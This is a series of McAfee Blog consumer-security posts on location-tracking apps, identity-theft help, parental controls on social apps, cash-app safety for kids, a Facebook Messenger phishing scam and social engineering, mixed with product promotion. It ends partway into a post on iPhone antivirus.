What Types of Apps Track Your Location?

Your mobile phone can do so many things, thanks to the wonders of technology. One of those things is having very accurate information about your location. In fact, some apps have to know your location to work.  

Of course, you can’t expect Google Maps to function as it should without tracking your location. But you’re right to question why a messaging app like WhatsApp needs to know your whereabouts. When it comes to protecting your online privacy, the less information that third parties have about you, the better. 

Keep reading to learn which mobile apps have location tracking and how you can revoke their access. 

How to see which apps are tracking your location 

On an iPhone, apps can track your location, but only after giving them access first. Here’s how to check which apps can monitor your location:  

1. Open the “Settings” app and click on “Privacy” to see a list of apps that have requested access to your location data. 
2. Click on “Location Services.” This will show you every app that can request access to your location. You’ll also see if you’ve given any apps permission to track your location. Note that the permission you give to apps to access your location can be at all times or only when you’re using the app.  
3. To check into a specific app, tap it. You’ll see what permission you’ve granted — the active one will have a checkmark. There are three options: 

• Never: The app isn’t ever allowed to access your location data. 
• When using the app: Whenever you open the app and use it, it’ll be able to track your whereabouts. 
• Always: This means the app can access your location data at all times, whether you’re using it or not. 

If you have an Android device, you can check what permissions you’ve given to the app following these steps:  

1. Go to “Settings.”  
2. Then, go to “Apps & Notifications.”  
3. Select an app, tap “Permissions,” and tap on the triple-dot icon.  
4. Click on “All Permission” and scroll down to the Location section.  

You’ll see the GPS tracking permissions you’ve granted. The apps you’ve allowed access to your location all the time will be under “Allowed all the time.” The apps that can track you while you’re using them will be under “Allowed only while in use.” And you’ll find the apps you’ve never granted permission under “Not allowed.” 

How to stop apps from tracking your location

Remember that some apps need location data to function properly. For instance, a navigation app like Apple Maps isn’t very useful if it doesn’t know where you are. 

But whenever you want to turn off location tracking for particular apps, you can simply cancel their access. 

If you have an iOS device, follow these steps:  

1. Open “Settings.”  
2. Tap “Privacy” and click on “Location Services.”  
3. Next, tap the app you want to change the location setting for.  
4. Then, select the option you want, like “Always,” “While using,” or “Never.” 

To change the location setting for apps on an Android phone:  

1. Tap on “Settings.”  
2. Then, tap on “Apps & Notifications.”  
3. Pick an app and tap on “Permissions.”  
4. Switch “Location” to on or off. 

Common types of apps with location tracking

There are many reasons apps need to know your location history, such as personalizing your app experience. Not to mention that location tracking apps like Find My iPhone and family location-sharing apps like Life360 are very helpful for family members to keep track of their loved one’s location.  

But simply speaking, the main reason apps track your location is because it’s profitable. Your information is sold to marketers, making it easier to show you ads you should be interested in.   

This is why it’s always a good idea to check what apps access your location information. So, check them regularly, following the steps laid out above.  

Common apps to watch for location tracking include: 

Map apps

Of course, navigation apps need to know your current location so that they can direct you to where you want to go. Getting access to your real-time location allows them to give you turn-by-turn directions. The apps also use a GPS tracker to help you find establishments like restaurants or gas stations nearby.  

Ride-hailing apps

Ride-hailing apps like Uber and Lyft use your GPS location to let drivers know where to pick you up. Be careful about ride-hailing apps, though, because their tracking features are made to monitor your movement in the background. This means they can access your location all the time, even when the apps aren’t active.  

So, if you’re not a regular ride-hail user, check these phone tracking apps when you’re not using them and turn off the location settings until you need them again. 

Social media

Like most free apps, social media apps collect personal and location data so they can learn who you are. And everything they know about you is used for advertising purposes. This is why you might get “find my friends” suggestions and ads about cafes, stores, and everything else that’s available in your area.  

Something to be aware of is that the ways social media apps like Facebook ask for permission to access your location data aren’t always straightforward. For instance, if you’re posting a photo, the app will ask you to “Turn on Location Services” to add a geo-tag. And if you do, they’ve got the green light to track your whereabouts.  

News and weather apps

When you check the news and weather forecast by using an app, the app asks for your location to provide you with information based on where you are.  

Giving these apps your location can help with the user experience since you won’t have to search for local news or weather updates. But not giving the apps access to your phone location doesn’t affect how they operate.  

Coupon apps

Coupon apps like Flipp want as much information from you as possible to personalize your experience. Location sharing helps these apps provide you with the closest stores to shop and ongoing sales near you. 

In the case of coupon apps, geofencing helps in their marketing quite a lot. With geofencing, apps use radio frequency identification (RFID), Wi-Fi, and GPS location to send ads at exactly the right moment to a target device. The ad can be sent as an SMS, email, or app notification when a cellphone enters or leaves a geofence.  

An example would be a text message that says, “Today only! Spend $50 and get the item of the day for $0.99!” when a customer enters a grocery store.  

Streaming apps

Streaming apps like Netflix and Spotify may ask for your location so that you don’t get access to geo-restricted content. For instance, live streaming TV apps need your location to confirm regional blackouts and other features. But other than that, they don’t necessarily need to monitor your location to work. 

Insurance apps

Car insurance companies have found a way to use technology by offering discounts to clients who allow them to collect personal information and share location data. Some of the information they want include your phone use while driving, how fast you drive, or how sharply you brake. Insurance companies claim that their phone tracker apps collect data to reward good behavior and avoid accidents. 

See how McAfee Security for Mobile keeps your device safe

Our mobile phones are one of our most valuable possessions because we rely on them to get us through the day. That’s why it’s important to understand how information about you and your activities is used, shared, and sold.  

 

The good news is that you can protect your digital life with McAfee Mobile Security, which allows you to connect safely and seamlessly to the digital world with a virtual private network (VPN). You’ll also have access to an antivirus app that regularly scans for online threats like malware.  

 

This means you can use public hotspots, make bank transactions, and surf the web in a safe space. McAfee helps protect your credentials and personal information so that you can continue to enjoy the internet your way.  

The post What Types of Apps Track Your Location? appeared first on McAfee Blog.

5 Ways to Get Victim Assistance for Identity Theft

The internet makes a lot of things in life easier. You can shop, pay your bills, and even book your next getaway. Unfortunately, the internet is also home to some less-than-savory characters who are looking to take sensitive information for personal gain. 

Private information like credit card numbers, driver’s license numbers, phone numbers, and Social Security numbers (SSN) can fall into the wrong hands — leading to identity thieves opening new accounts, taking out loans, and even filing tax returns in their victims’ names.  

Fortunately, victims of identity theft and concerned individuals can access several helpful resources designed to respond to or prevent identity theft through the Federal Trade Commission (FTC), such as IdentityTheft.gov. McAfee Identity Protection can also keep personal information secure with 24/7 monitoring and restoration support.  

This article will explain some common types of identity theft and the resources you can turn to in case identity theft becomes an issue for you.  

What are the most common types of identity theft?

The internet is the place to be if you’re looking to shop, connect with others, and get access to all the information you could ever need. Obviously, we spend a lot of time online, and cybercriminals know that.  

The good news is that a little information can go a long way in protecting your sensitive data. Some common types of identity theft include:  

• Financial identity theft: Criminals can use your personal information for their financial gain. They might use personal bank funds or credit cards to make purchases or open a new line of credit in your name and leave you with the bill.  
• Criminal identity theft: Some criminals will go to great lengths to avoid arrest. Fraudsters can give a different name and show a stolen ID to get a clean getaway. This can leave you with a false criminal report in your name.  
• Medical identity theft: Medical identity thieves pose as someone else and can access medical services, like surgeries, or get prescription drugs and other medical devices and supplies. This can affect your health insurance coverage and make access to health care difficult.  
• Child identity theft: This type of offender commits financial fraud with a minor’s personal information, such as their SSN. With this information, an identity thief can apply for government benefits, get a driver’s license, and even buy a house.  
• Synthetic identity theft: Identified as the fastest-growing financial crime, criminals create an identity persona from real information and create a completely new and fake credit file.  

If you have any reason to believe your identity has been stolen, it’s important to report identity theft or suspicious activity to local police, financial institutions, and credit card companies as quickly as possible. You’ll also want to get a copy of your credit reports from each of the major credit bureaus by visiting annualcreditreport.com and routinely check all of your bank statements. 

5 ways to get identity theft victim assistance

Identity theft can be scary, but several resources exist to help victims. Some key ID theft resources include the IRS, IdentityTheft.gov, IDtheftcenter.org, Fraud.org, and McAfee Total Protection.  

IRS Identity Theft Victim Assistance

The Internal Revenue Service (IRS) can help with tax-related identity theft. Tax-related identity theft victims may self-report or receive a notice or letter from the IRS about a suspiciously filed tax return. Signs of tax-related ID theft include receiving a tax transcript you didn’t ask for, getting a report of unknown wages or other income, or not being able to e-file because of a matching SSN.  

Whether you report identity theft or suspicious activity to the IRS or they tell you, you’ll want to follow instructions to resolve any fraudulent tax issues. You may need to verify your identity with Letter 4883C or complete an Identity Theft Affidavit (Form 14039).  

Once everything has been settled, the IRS will tag your account with an identity theft indicator for added protection in the future. In some circumstances, you may even receive an Identity Protection Pin (IP PIN) to use when filing an electronic or paper tax return.  

IdentityTheft.gov

IdentityTheft.gov is a federal resource that can help victims recover from identity theft. The site provides an overview of victim rights, sample letters you can use to dispute any fraudulent credit or debit card charges, and a checklist to track your progress.  

IdentityTheft.gov can help with any identity theft, including that related to student loans and fraudulent unemployment insurance claims. You’ll need to explain your situation in great detail to receive a personalized recovery plan.  

IDtheftcenter.org

The Identity Theft Resource Center (ITRC) helps prevent, recover, and protect individuals and businesses from identity theft. This nonprofit organization provides information and assistance at no cost and can help with account takeovers, data breaches, email scams, and other fraudulent account activities. You can also sign up for ID Theft News and stay informed with newsletters and alerts.  

Identity theft victims can use the online chat or call to speak with an adviser who can help figure out the next steps to take. They may suggest filing a police report, placing a credit freeze, and/or obtaining free credit report copies from the major credit bureaus, like Experian, TransUnion, and Equifax.  

Fraud.org

A project of the National Consumers League, Fraud.org collects and shares decades worth of consumer complaints related to fraud. With advocacy, education, and consumer counseling, Fraud.org helps consumers protect themselves from telemarketing and internet fraud.  

Fraud.org raises awareness about many types of common and unexpected scams, including phony sweepstakes prizes, government grants and scholarships, online phishing for financial account numbers and other personal information, malware downloads, and the possibility of a financially disastrous ending after falling in love online.  

You can sign up for fraud alerts or file a complaint on the secure website and Fraud.org will share your story with their network of law enforcement agencies.  

McAfee Total Protection

Identity protection with McAfee Total Protection Ultimate provides around-the-clock email address and bank account monitoring, which includes $1 million of ID theft coverage on qualifying losses. As a subscriber, you’ll also gain access to hands-on restoration support to help with reclaiming your identity.  

McAfee Total Protection can go wherever you go. Stay in the know on your tablet, laptop, or smartphone and receive critical alerts. The software also provides a Protection Score that can help you secure any weak areas that may leave you open to ID theft.  

See how McAfee Identity Protection keeps you safe

Use the internet your way and protect your sensitive information with 24/7 account monitoring and alerts. McAfee Total Protection adds an additional layer of security by keeping tabs on up to 60 unique types of personal information. We’ll also guide you through the best choices for prevention and alert you as soon as action is needed.  

Get protection from data breaches and malicious software like viruses and malware and benefit from fraud alerts 10 months sooner than our competitors. Get the peace of mind that comes with knowing that McAfee is looking out for you and keeping your identity safe. 

The post 5 Ways to Get Victim Assistance for Identity Theft appeared first on McAfee Blog.

McAfee and Telstra Partner to Bring Privacy, Identity and Security to Australian Customers

McAfee announces a partnership that will grant new and existing Telstra customers easy access to McAfee’s leading security solutions to deliver holistic security and privacy protection through its integrated suite of services including Antivirus, Parental Controls, Identity Protection, Secure VPN and more, to protect and secure multiple devices including mobiles, PCs and laptops. The partnership brings added protection to Telstra’s millions of customers and their devices via McAfee’s intuitive and integrated consumer security platform 

“A recent McAfee study found 27% of Australians surveyed reported attempted account theft and 23% had experienced financial account information leaks,” said Pedro Gutierrez, Senior Vice President of Global Sales and Operations at McAfee. “As the proliferation of life online accelerates, we are thrilled to be partnering with Telstra who are showing through this collaboration, a commitment to innovation and to their customers by investing in new infrastructure and technologies that safeguard their mobile and broadband subscribers. 

McAfee’s integrated consumer security platform offers a wide array of mobile security solutions to protect customers’ privacy and identity while blocking viruses, malware, spyware, and ransomware attacks. This partnership allows Telstra’s customers to take advantage of these capabilities and protect themselves from additional threats including potential hacks, identity theft and broader gaps in online and mobile security so they can live life confidently online.   

“In today’s increasingly connected world the risk of cyber threats continues to grow. To counter the risk, Telstra is committed to providing our customers with the safety and security features needed to protect them online,” said Matthew O’Brien, Cyber Security Executive and Group Owner at Telstra. “This partnership with McAfee helps drive our mission to build a safe and secure connected future where everyone can thrive, and further complements Telstra’s T25 ambition to extend our network leadership position by delivering greater value to our customers.”  

To activate Device Security, Telstra customers can simply go in-store, online or to their MyTelstra app. The full suite of McAfee features supported include Antivirus/System Scan, Safe Browsing, Protection Center, Identity Protection, Password Manager, Parental Controls, Protection Score and Secure VPN. All eligible Telstra customers can try Device Security for three months on Telstra, then auto-roll onto $10/month after. 

The post McAfee and Telstra Partner to Bring Privacy, Identity and Security to Australian Customers appeared first on McAfee Blog.

Setting Up Parental Controls in TikTok, Instagram & Snapchat

It’s a question we get a lot from parents: “How can I keep my kids safe when they are constantly hopping between so many different apps?” We get it, there’s a lot to stay on top and all of it changes constantly. Unfortunately, that question doesn’t have a simple answer. But there are some baseline actions every parent can take to boost their child’s safety on popular apps like TikTok, Snapchat, and Instagram.  

The safety equation is threefold, with every piece as important to your child’s overall safety as the next.  

1. Connection and conversation. The first part of the safety equation is maintaining a strong relationship with your child so that dialogue (two-way; no lectures) on digital safety and wellbeing becomes commonplace and they know they can come to you if they have a problem. One way to keep those conversations rolling is to download your child’s favorite apps so that you understand first-hand how the communities work and the type of content that’s being shared. 
2. Install parental controls. The second part of the safety equation is to add parental controls. Do we have an agenda here? You betcha! For decades, we’ve put some of the world’s brightest engineering minds into designing digital tools that allow families to enjoy the best of the Internet without giving them the rest of the Internet that could put their emotional and physical wellbeing at risk. McAfee’s targeted software helps parents monitor and filter web searches and content, set time limits, and view daily activity reports.  
3. Access platform tools. The third way is to take a few minutes to ensure your kids are using the platform-level tools available on both their devices and within the apps. Both Apple and Android phones have basic safety and wellbeing features. Additionally, the apps your kids likely love—Tik Tok, Snapchat, and Instagram—have their own set of safety tools.  

Screentime is Climbing 

A report released in 2021 by Common Sense Media found that teenagers (ages 13-18) use an average of nine hours of entertainment media per day and that tweens (ages 8-12) use an average of six hours a day, not including time spent using media for school or homework. The report also found that boys spend more time on gaming devices while girls spend more time on social media and that mobile devices now account for 41% of all screen time among tweens and 46% among teens. 

With those numbers increasing each year, it’s even more important to understand the different ways parents can help kids stay safe. Let’s break down a few safety basics on each app that are easy to access and use.    

Tik Tok Safety 

TikTok has some impressive safety guidelines broken down into topics parents could easily use as a springboard for some great family discussions. The guidelines and the Safety Center cover issues such as dangerous TikTok challenges and how to deal with other digital threats such as bullying, sexual content, fake news, and hateful behavior. You can increase safeguards using TikTok’s: 

• Family Pairing. TikTok offers Family Pairing that allows parents to link their account with their child’s to co-control settings on privacy and content. This TikTok feature allows a parent to monitor and manage screen time, direct messages, set restrictions, and control friend and comment filters.  
• Restricted Mode. There is a Restricted mode for accounts that can help filter basic mature content on TikTok. 
• Privacy Settings. To ensure your child isn’t connecting with unknown people on TikTok, you can go into the settings and make their account private.  
• Digital Wellbeing. We all know how easy it is to get sucked into spending hours on an app without even getting up to stretch or give our eyes or minds a break. Turning this function on will send alerts to users who have been on the app for more than two hours.  

Snapchat Safety 

Every app functions differently and thus, offers different ways to boost security. Snapchat provides a helpful guide for parents and educators, including safety tips and conversation starters. You can increase safeguards using Snapchat’s: 

• Privacy Settings. Sit down with your child to ensure their privacy settings are adjusted to choose who can send them Snaps, view their Stories, or see their location on Snap Map. They can also manage who views your child’s content with My Story. 
• Friends Only Feature. Snapchat was made for keeping in touch with your close friends, so the app Safety Center recommends users “only friend or accepts friend requests from people that you know in real life.” 
• Report Abuse Feature. Ensure your kids understand how to report abuse on Snapchat, including harassment, bullying, or other safety concerns. If someone makes them uncomfortable, they can block that Snapchatter and leave any group chat. Here’s more on reporting abuse or safety concerns. 
• Think before you share. Snaps are designed to delete by default within 24 hours. However, remind your kids that people who send Snaps can still take a screenshot or take a picture of the Snap with another device. Therefore, on Snapchat especially, advise your kids to think before sharing. 

Instagram Safety 

Instagram offers parents and minor users a library of safety and mental health resources accessible via the app’s Community Tab at the bottom of its home page. You can increase safeguards using Instagram’s: 

• Family Center. A parent or guardian can supervise a teen’s Instagram account, provide extra support, and help balance their time. Parents of teens can remove supervision anytime, and the tool is automatically removed when the teen turns 18. 
• Privacy Controls. Your teen’s account can be set to private, which means their content will only be seen by approved followers. In addition, they can also block and report abusive accounts.  
• Comment Controls. Avoid unwanted interactions by encouraging your child to use “Comment Controls.” In addition, reporting and blocking tools also allow them to manage who can comment on their posts.  
• Direct Message Safeguards. Instagram restricts Direct Messages (DMs) between teens (under 18) and adults they don’t follow. When an adult tries to message a teen who doesn’t follow them, they receive a notification that DM’ing that teen isn’t an option. For adults and teens already connected (i.e., one account follows the other), Instagram sends safety notices encouraging teens to be cautious in conversations with adults who have exhibited potentially suspicious behavior. (Note: This feature does not protect kids from connecting with fraudulent catfish accounts created using false profile and age information). 

One of the most powerful safety features is you—a child’s mom, dad, or guardian. Your face-to-face, heart-to-heart connection will speak loudest in your child’s life. If you haven’t lately, ask your child what’s going on in their digital life, who their friends are, what they’ve created to share, and what’s new, hilarious, or trending. You may get some resistance now and then but don’t let that discourage you from pressing in and doing all the things that help keep them as safe as possible online.   

The post Setting Up Parental Controls in TikTok, Instagram & Snapchat appeared first on McAfee Blog.

#McAfeePride2022

In the spirit of #PrideMonth, McAfee hosted month-long celebrations across the world. One of these was a live event hosted by the McAfee Pride Community with a guest speaker from the Resource Center that focused on the history of Pride, support, allyship, and belonging.

We took a moment to ask our event guest speaker, Leslie McMurray, about the work that Resource Center does, the importance of pride, and what companies can do to create inclusive work environments.

Tell us a bit about Resource Center and what you do?

“We like to say, if we had an “elevator pitch”, we would need a really tall building! Resource Center has been around for 39 years and is one of the largest LGBTQIA+ community centers in the United States, it is a primary HIV/AIDS service organization in Texas.

Some of the work that we do includes operating a food pantry and hot meal program that serves low-income people living with HIV. We have a case management department that helps locate resources that we don’t directly provide, like housing. And we have a primary care clinic that is gender-affirming and a ten-chair dental clinic that also serves those living with HIV.

We also have a youth program called Youth First that serves youth from middle-to-high school. We have a behavioral health program and a clinic that does free testing for HIV and STDs along with a mobile health unit that does free testing in outlying areas. Finally, our advocacy department has three full-time employees!

Why it is important to learn about pride?

“Sometimes we get asked “What’s ‘Pride’ about? Why do you need a parade?”

It’s important to understand that LGBTQIA+ people are still working to achieve equal rights – the same as everyone else.

The tipping point of the fight for equal rights in the US dates back to 1969 when the Stonewall Uprising took place in Manhattan. The first Pride march was held a year later to honor the anniversary of the Stonewall Uprising and continues to take place during the month of June each year. And while we appreciate the attention during the month, the continued fight for equal rights for the LGBTQIA+ community is yearly, and we need continuous support and allyship of people and businesses year-round.

So it’s really important for people to learn about diverse populations, understand what their challenges are, and educate yourself on these issues – from that spring’s allies.”

What should companies do to create inclusive work environments

“One of the simplest things for companies to do is to include ‘Sexual Orientation, Gender Identity and Gender expression’ in your Equal Employment Opportunity statement. Other things companies can do is to look at putting a policy in place for transgender employees who are transitioning and consider including transgender healthcare in your company benefits package.

Make sure to help foster understanding by getting employees to do training with organizations like Resource Center. And empower upper management to lead the way ensuring all employees can bring their whole selves to work. Finally, when the opportunity arises look at working with and bringing in non-profit organizations into your company to continue spreading awareness and support for the LGBTQIA+ community.

And while June wraps up Pride month, year-round we work towards a workplace and community where all can belong – a workplace where our unique differences are celebrated and where we all stand together for equality. #McAfeePride

Learn more about the incredible work that Resource Center does here

Interested in building your career at a company where you can belong? Search our openings!

The post #McAfeePride2022 appeared first on McAfee Blog.

Kids & Cash Apps: What Parents Need to Know

Fewer people carry cash these days, kids included. This growing paperless reality fast-forwards the parenting task of educating kids on financial responsibility. As of 2021, most cash apps allow kids 13 and up to open accounts (previously, the age was 18). Kids can also get a cash app debit card for retail purchases. But while cash apps are a popular and convenient tool, they come with some risks families should consider.  

Instant Transactions 

Cash apps allow kids to exchange money with friends directly from a secondary established account, much like handing another person cash. Cash apps have become a popular tool with kids and an easy way to split costs or pay someone for a purchase. Cash apps also come in handy for families and allow parents to instantly send their children money for daily expenses such as school or sports fees, meals, purchases, or entertainment. Some common cash apps include Venmo, Zelle, Cash App (Square), Pay Pal, Zelle, and Facebook Pay, among others.   

Some Risk 

Sounds awesome right? But with ease comes risk. Most money transfer app funds are not FDIC insured. That means if your child (or you) accidentally sends money to an unintended recipient, they may have a tough time recovering those funds.  

Every app comes with some degree of risk. While the leading cash apps are considered secure and can be used with little concern, there’s always the potential of a cyber crook finding a security loophole that exposes your money, banking information, and identity.  

10 Cash App Safety Tips for Families 

1. Discuss the risks. Clicks within a cash transfer app equal real cash. Help your kids understand digital money is equal to actual dollars. Take the time to discuss current scams and how to practice extra care when using cash apps.  
2. Use safeguards. Using security best practices is not a skill that comes naturally to most people. It’s something that must be practiced and improved constantly. Just like computers, mobile devices can be infected with viruses and malware. One way to protect mobile devices (and cash apps) is to subscribe to a mobile antivirus product, such as McAfee Mobile Security, which includes safe browsing, scanning for malicious apps, and locating your device if it is lost or stolen.  
3. Layer up app security. In addition to an antivirus tool, guide your kids in how to add additional security to their cash apps. Guide them in how to follow password security protocols and how to add protection in the form of a PIN code, facial ID, or fingerprint ID. While you are at it, make sure your child locks their device in the same way. These steps offer more protection in case your child’s phone is stolen or lost, and a stranger attempts to use the cash app.  
4. Slow down and verify. As fast as kids’ fingers move on keypads, advise your child to slow down and verify spelling and a recipient’s account address when using a cash app. Most cash app providers will not help users recover misdirected funds. One typo or clicking on the wrong Jake Williams in the recipient list can cost you or your child big bucks.  
5. Only connect with friends. When using cash apps, advise kids to only exchange money with people they know. Scammers have been known to befriend minors only to ask for a loan or offer goods or services. Once the payment is sent, the scammer instantly deletes their accounts and is gone without a trace.  
6. Stay on top of cash app scams. Check BBB Scam Tracker to see how bad actors are targeting cash app users. In searching cash app scams on this site, consider reading the personal stories (click “details” of each reported scam) of the people who have been victimized. This might be a very effective way to converse with your kids about the natural consequences of online scams.  
7. Safeguard personal data. Remind kids not to share their email, address, or other information. Also, avoid clicking pop-up ads, trendy quizzes, and random website URLs designed to plant malware on a device that steals bits and pieces of personal info that can be used for various attacks, including financial and identity theft.  
8. Link your app with a credit card. If possible, consider linking your child’s cash app to a credit card rather than a bank account. Debit cards remove cash from an account instantly, but credit cards offer consumer protection in cases of fraudulent transactions. The one drawback is that a credit card company will charge interest on your balance.  
9. Keep app balances low. Cyber crooks can’t steal funds that aren’t there. For that reason, it’s wise to keep balances low in your child’s cash app account.  
10. Teach financial literacy basics. The cash app conversation is an excellent opportunity to begin or expand your family’s conversation on financial literacy. Here are several helpful resources that will help you teach your kids financial literacy at any age.     

The use of cash apps is here to stay and, no doubt, an integral part of the overall paperless fast track we’re all on. Guiding kids into this realm equipped with knowledge and confidence is a powerful way parents can help kids enjoy the responsibility of money without falling prey to digital risks.     

The post Kids & Cash Apps: What Parents Need to Know appeared first on McAfee Blog.

Over 10 Million Facebook Users Hacked in Ongoing Phishing Scam

In this digital age, communicating online and through our devices has become the norm. From sharing highlights of last night’s game to sending cute animal videos back and forth, so much of our connectedness happens virtually. It’s become so easy to chat with friends and loved ones through social media that we don’t even have to think about it. We know who’s on the other end of the screen, so why would we worry? We know our friends would never send us a malicious link that would steal our information, so why be cautious? Right? 

Not necessarily. Though a message or link may seem like it’s coming from a friend, it’s also possible that it was sent without their knowledge. There are many ways for hackers to scam people very believably. The latest Facebook Messenger hack is just one of many examples. 

Facebook Frenemies 

According to PIXM, Facebook users have been conned for several months by a phishing scam that tricks them into handing over their account credentials. Users are shown a fake login page that copies Facebook’s user interface, giving it the illusion of being real. When someone enters their credentials, their password and login combo is sent to the hacker who then sends out the same link and fake login to the user’s friends through Facebook Messenger. Any user who clicks the link is asked to fill out their credentials, and the cycle repeats. PIXM estimates that over 10 million Facebook users have been duped by this scam since 2021. 

This hacker was able to utilize a technique to evade Facebook’s security checks. When a user clicks on the link in the Messenger app, the browser redirects to a legitimate app deployment service, then redirects again to the actual phishing pages with advertisements and surveys that accrue revenue for the hacker. Using this legitimate service link prevents Facebook from blocking it without blocking other legitimate apps and links as well. Researchers say that even if Facebook managed to block one of these links, several others are created with new unique IDs every day to replace it. 

Phishing scams like these are harder to detect due to the realistic-looking interface on the login pages and that these malicious links are seemingly coming from friends and family. However, there are always key things to look out for when faced with phishing scams. 

Swim Away From These Phishes 

Scams don’t always come from overtly sketchy emails or text messages from strangers. Sometimes they can (unintentionally) come from people we know personally. This isn’t to say that your friends online can’t be trusted! However, it’s important to always be cautious and keep an eye out for any odd behavior to stay on the safe side. Here are some key things to look out for when faced with potential malicious phishing scams: 

• Lack of personalization. These types of scams may be coming from online friends you don’t speak to often, if at all. If someone you rarely speak to is sending you links out of the blue, that’s an automatic red flag. But if you’re still unsure or if this is coming from someone you know well, pay close attention to the message, the greeting (if any), and whether it’s personalized or not. If it seems cold or overly general, avoid it!
• Links don’t look quite right. If you’re receiving a link through email, hover over the URL without clicking on it to see the link preview. If it looks suspicious, delete it altogether. For links being sent through social platforms, check to see if the URL matches the content in the message being sent to you or if there is a preview attached. If these things don’t match or aren’t present, it’s best to play it safe and stay away.
• Spelling and tone seem off. If the message you’re receiving is riddled with spelling or grammar mistakes, proceed with caution, especially if it’s unlike your friend to have those types of errors in their messages. In that same vein, if the tone of the message doesn’t match the typical vibe of the person you’re receiving it from, it’s best to ignore it and move on!
• The message is telling you to act. Always be wary of a strange message and link asking you to act. If the message is telling you to download something, don’t click any links or attachments. Simply delete the message and carry on!

When in doubt, just ask! If you’ve received a message and a link from a friend online, simply ask if they meant to send it to you. If they didn’t send it themselves, not only did you dodge a bullet, but your friend is also now aware that they’ve been hacked and can take the necessary precautions to ensure their information is protected. And if they did mean to send it to you, then you can click the link knowing that it’s safe to do so. It’s always best to err on the side of caution when it comes to your online security. 

The post Over 10 Million Facebook Users Hacked in Ongoing Phishing Scam appeared first on McAfee Blog.

It’s Social Media Day! Here’s How to Protect Yourself From Social Engineering Online

It’s Social Media Day! How are you celebrating? Reposting your very first profile picture from a decade ago? Sharing your most-loved status update or the photo you’re most proud of? This year, consider commemorating the day by learning more about how to keep your information safe. Enjoy your favorite platform, but be on the lookout for scams, such as social engineering. 

What is Social Engineering 

Social engineering is a cybercrime common to social media sites. It is a tactic where a cybercriminal lurks on people’s social media pages, gleaning personal information that they then use to impersonate them elsewhere. 

With more than half of the global population on social media, you may think that a cybercriminal will never single you out from such a huge pool; however, it is possible.1 Luckily, you only have to make a few, easy changes to your online habits to keep your valuable private information just that: private. Check out these tips to make smart decisions and be more confident about your and your family’s online security. 

Why Do Cybercriminals Care About Social Media? 

Think of the types of posts you share with your dozens – or even hundreds or thousands! – of followers: updates about your life, where you live, work, or favorite travel destinations, your hobbies, pets, family members, etc. All of these details, that only you and those closest to you should know, are a valuable commodity to cybercriminals. Plus, now that social media shopping is growing in popularity, the credit card information linked to accounts is sweetening the deal for cybercriminals. 

Here are a few social engineering scams that are common to social media.  

Credential stuffing

People commonly create passwords based on things, places, and people that are important. Have you ever published a 20 questions-style get-to-know-me post? Those contain a lot of valuable personally identifiable information (PII). With just a few of those details about your personal life, cybercriminals can make educated guesses at your passwords, a tactic called credential stuffing. If they’re able to crack the code to one of your accounts, they’ll then input that password and login variations in several other sites, especially online banking portals, to see if they can gain entry to those too. 

Fake contests 

You’ve won! Send us your banking information and address, and you’ll receive a package in the mail or a direct deposit to your bank account!  

But did you enter a drawing for a prize? Very rarely does anyone win something just by being a follower of a certain page. If you receive a message similar to the above, it’s likely a phisher trying to draw more PII and sensitive banking information out of you. Or, the message may have links within it that redirect to an untrustworthy site. If you regularly enter social media contests, keep a list and only respond to legitimate ones. Also, never give your banking information out over social media, private messages, or email. 

Emotional messages and posts

There are plenty of valid fundraisers and petitions circulating around social media; however, there are just as many social engineering scams that dupe social media users because they inspire a strong emotion in them. For example, there have been several scams around Ukrainian donation sites. Cybercriminals often use fear, anger, or sadness to inspire people to open their wallets and share confidential banking information. 

How to Protect Yourself from Social Engineering

Luckily, all it takes is a few smart habits to stop social engineers in their tracks. Consider the following tips and make these small changes to your social media usage: 

Edit your follower or friend lists

At this point, you’ve probably had several of your social media accounts active for over a decade. That means it’s time to do some cleaning out of your friends and followers lists. It’s best to only accept requests from people you personally know and would actually like to keep in the loop about your life. A friend and follower request from strangers could be cyber criminals in disguise. Also, consider setting your account to private so that your posts are invisible to strangers. 

Slow down and think 

Social engineering hacks often bank on people acting rashly and quickly because of strong emotion, either excitement, fear, sadness, or anger. If you see a post on your newsfeed or receive a direct message that gives you a tight window to respond and asks for PII, slow down and think before acting. Double-check the destination of every link in the message by hovering over it with your cursor and checking the link preview at the bottom of your browser screen. Be careful, because some link previews include slight misspellings of legitimate websites. As a great rule of thumb, be automatically skeptical of direct messages from people you do not personally know. And if a DM from a friend seems out of the ordinary, shoot them a text to confirm they actually sent it. It could be that their social media account was hacked and a criminal is spamming their followers.   

Create strong, unique passwords or passphrases

A password manager will go a long way toward ensuring you have unique, strong passwords and passphrases for every account. Not reusing passwords makes credential stuffing impossible. McAfee True Key stores all your logins and passwords and guards them with one of the strongest encryption algorithms available. All you need to do is remember your master password. It’s a great practice to also enable multifactor authentication whenever a website offers it. This makes it incredibly difficult for a cybercriminal to break into your online accounts with their educated guesses at your password. 

Live More Confidently and Safely Online 

Now that you know what to look for and the best tricks to be safe, you can feel more confident that you’re doing everything you can to protect your online accounts and private information. McAfee Protection Score can also help you take control of your online safety. This service allows you to monitor your current online safety and encourages you to take specific steps to improve it. Now you can enjoy digitally keeping in touch with your friends with peace of mind! 

1Smart Insights, “Global social media statistics research summary 2022” 

The post It’s Social Media Day! Here’s How to Protect Yourself From Social Engineering Online appeared first on McAfee Blog.

Does an iPhone Need Antivirus Software?

If you’re one of the countless Apple iPhone owners out there, there’s a good chance that one of the reasons you love your smartphone is because you’ve heard that Apple devices tend to have fewer vulnerabilities to viruses.  

Because of their shared operating system, iOS devices enjoy Apple’s security measures, which keeps them protected from malware and viruses differently from most Android devices.  

This is great, right? Certainly! But it’s also important to remember that nothing digital or internet-related is ever foolproof, and while it’s rare, even iOS operating systems can be affected by malicious software.  

The great news is that protecting yourself from iPhone viruses and hackers isn’t hard. Read on to learn more. 

Can iPhones get viruses?

Although Apple has designed its iOS system to be pretty untouchable, it’s still possible to get a virus on your iPhone.  

The biggest way this can happen is through something called “jailbreaking,” which is when you bypass the restrictions on the Apple operating system. You might do this to gain more control over your device, downloading any apps or programs from anywhere on the internet. It basically lets you do whatever you want with your iPhone. 

A major reason that mobile security is so seamless with Apple’s iOS is that — unlike Android and Microsoft Windows products — Apple devices are designed to work only inside set parameters that “talk” exclusively to other approved Apple apps or devices.  

This is all controlled by Apple encryption, making your iPhone security rather impervious to malicious apps. You might also notice that there are no antivirus apps in the App Store, which isn’t a coincidence! 

But when you jailbreak an iPhone, this means you’ve opened the iOS to a wider range of apps, features, and themes — none of which are approved by Apple!  

So, you won’t benefit from the virus protection that comes from having a closed system, meaning you can expose your iPhone to adware, scams, and other internet security issues that Apple permissions blocked. 

Potential threats to your iPhone

